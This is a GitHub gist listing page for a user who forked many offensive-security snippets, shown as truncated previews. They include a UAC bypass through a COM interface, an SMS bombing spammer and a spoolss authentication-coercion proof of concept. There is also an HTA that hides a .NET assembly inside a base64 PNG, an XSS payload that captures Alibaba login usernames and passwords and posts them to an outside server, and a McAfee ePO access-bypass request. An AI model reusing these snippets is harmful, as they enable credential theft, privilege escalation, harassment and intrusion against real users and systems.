Skip to content

Instantly share code, notes, and snippets.

View unbaiat's full-sized avatar

unbaiat unbaiat

  • Unicorns United Ltd
  • Castalia
View GitHub Profile
@unbaiat
unbaiat / NCryptCreatePersistedKey_virtual_iso.c
Created November 17, 2019 03:31 — forked from gentilkiwi/NCryptCreatePersistedKey_virtual_iso.c
#define NCRYPT_VIRTUAL_ISO_MAYBE 0x10000
#define NCRYPT_VIRTUAL_ISO 0x20000
#define NCRYPT_PER_BOOT_KEY 0x40000
NTSTATUS kuhl_m_standard_test(int argc, wchar_t * argv[])
{
SECURITY_STATUS status;
NCRYPT_PROV_HANDLE hCngProv = 0;
NCRYPT_KEY_HANDLE hCngKey = 0;
DWORD keyLen = 2048;
@unbaiat
unbaiat / akagi_58a.c
Created October 24, 2019 13:43 — forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@unbaiat
unbaiat / sms-bomber.py
Created June 20, 2019 19:14 — forked from BlackVikingPro/sms-bomber.py
SMS Bombing (Spamming) Application! [Python]
#! /usr/bin/env python
import time, smtplib, sys, getpass
# need to define:
"""
e-prov (email-provider) [gmail]|[yahoo]|[custom]
from [attacker email]
from-spoof [spoof attacker email]
to [target email (syntax: [10-digit #]@mms|txt.[provider].com|net|org)]
c [count (# of txt's to send)]
@unbaiat
unbaiat / dementor.py
Created June 14, 2019 05:44 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@unbaiat
unbaiat / foxyproxy.json
Created June 3, 2019 06:49 — forked from liamosaur/foxyproxy.json
{
"mode": "patterns",
"proxySettings": [
{
"address": "127.0.0.1",
"port": 8080,
"username": "",
"password": "",
"type": 1,
"title": "127.0.0.1:8080",
@unbaiat
unbaiat / honeybadger.hta
Created May 24, 2019 09:36
HoneyBadger PNG - .NET Assembly Bypass
<html>
<img id="HoneyBadger" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABAAAAAKtCAIAAAA2LYveAAAACXBIWXMAAA7zAAAO8wEcU5k6AAAAEXRFWHRUaXRsZQBQREYgQ3JlYXRvckFevCgAAAATdEVYdEF1dGhvcgBQREYgVG9vbHMgQUcbz3cwAAAALXpUWHREZXNjcmlwdGlvbgAACJnLKCkpsNLXLy8v1ytISdMtyc/PKdZLzs8FAG6fCPGXryy4AAovrklEQVR42ty9i5bjSJIsFgGAZGZWVnX1vFa60tmj/z/6CR19ymp1R3dmerrrkZl8ACFztwiH40kwM6tnJW5PLZMEgXghYO5ubh7/z//jfw8hxOELn1RVFeZedZBvU0r2iX8/ffFs09fSr6qY1o+fXLqz9/yK/3ZdZ+8H/3Yn+9NeK5eIYTfbWfbLfm7dvHQt39tI2ldx8uL5l8Z/cFg5Cfu1MBRz81Kt9W7uPNG3x/d0dl7asDb76/M4bfP0yLbM49Jho3a2C+ttaR0uvTDO/if9RLcd3nT6Gk3c7Hl27vM4eT9dnzzlaApWzhAXzs8/67qu9GVfHbt73Nl1HSv8l7q2O3btpW3P6A5WirShi2WkZQdomtPsDdK27agB/PZY53VbxUav3OjVK/7ZNHv8o8s+H3Zpa54BDcA5bXnjYH9z8b1OyvPlcsF7fti2id3UraPe6atpGn6FI4/P3/EnD8D5tUfywq9affFU1oUmHvNC0hdbUsurmV9XOhQ8Unpdc6m0bD+6Jf/Grp/xC4elYpfxwsHlXN1wPejnqSlLBWfBDFW4QVOsOu7DEbPI3kXsPDjb8dxyQPDv+Xw+nS7YsXe7g05nbJrdfr9v6n3u/uXy9PKNS/3u7u5wOKCvGDR88/z8HEOtUyYvncQaDau6c3kSVFxdsmGkqk3dk77w+ePj44cPH5qd7JzpdNQ+5hfOjFbhX1xOxrSRUcUnuNzxeMSlcSg+5ySi
@unbaiat
unbaiat / doc.open.alipay.com-vulnerable-js-searchList-v2.js
Created April 15, 2019 07:41 — forked from Voorivex/doc.open.alipay.com-vulnerable-js-searchList-v2.js
function h(b, e) {
url = d.one(".J_ajaxUrl").val();
var f = "keyword=" + (d.one(".J_Tagword") ? d.one(".J_Tagword").val() : d.one(".J_SearchKeyword").val()) + "&searchType=" + e;
url.indexOf("?") > 0 ? url += "&" : url += "?",
c({
url: url + f + "&current=" + b,
type: "post",
dataType: "json",
data: {},
success: function(b) {
@unbaiat
unbaiat / Alibaba-final-xss-payload.js
Created April 15, 2019 07:40 — forked from Voorivex/Alibaba-final-xss-payload.js
document.forms[0].onsubmit = function() {
var u = document.getElementById('fm-login-id');
var p = document.getElementById('fm-login-password');
var s = new XMLHttpRequets();
s.open('POST', 'https://myserver/xxx-alibaba/');
s.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
s.onreadystatechange = function() {
if (s.readState == 4) {
document.forms[0].submit();
}
@unbaiat
unbaiat / cve-2018-6671.txt
Created March 8, 2019 14:12 — forked from leonjza/cve-2018-6671.txt
cve-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# Specifying an X-Forwarded-For header bypasses the local only check
# https://kc.mcafee.com/corporate/index?page=content&id=SB10240
# https://nvd.nist.gov/vuln/detail/CVE-2018-6671
#
# 2019 @leonjza
#
# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850
POST /Notifications/testRegExe.do HTTP/1.1
@unbaiat
unbaiat / Get-KerberosKeytab.ps1
Last active February 18, 2019 08:21 — forked from 0xhexmex/Get-KerberosKeytab.ps1
Parses Kerberos Keytab files
param(
[Parameter(Mandatory)]
[string]$Path
)
#Created by [email protected]
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
# keytab {